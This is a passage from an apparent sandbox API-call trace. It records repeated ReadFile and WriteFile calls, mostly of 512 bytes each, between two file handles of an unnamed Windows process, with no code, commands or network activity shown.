lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.353] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.353] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.354] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.354] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.355] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.355] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.356] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.356] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.357] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.357] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.358] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.358] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.359] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.359] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.360] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.360] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.361] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.361] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.362] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.362] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.363] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.363] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.364] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.364] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.365] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.365] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.366] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.366] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.367] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.367] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.368] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.368] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.369] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.369] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.370] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.370] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.371] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.371] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.372] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.372] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.373] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.373] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.374] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.374] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.375] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.375] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.376] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.376] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.376] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.377] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.377] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.378] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.378] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.379] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.379] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.380] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.380] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.381] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.381] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.382] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.382] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.383] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.383] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.384] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.384] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.385] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.385] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.386] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.386] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.387] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.387] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.388] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.388] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.389] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.389] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.390] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.390] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.391] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.391] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.391] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.392] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.392] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.393] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.393] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.394] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.394] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.395] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.395] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.396] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.396] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.397] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.397] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.398] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.398] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.399] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.399] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.400] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.400] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.401] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.401] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, 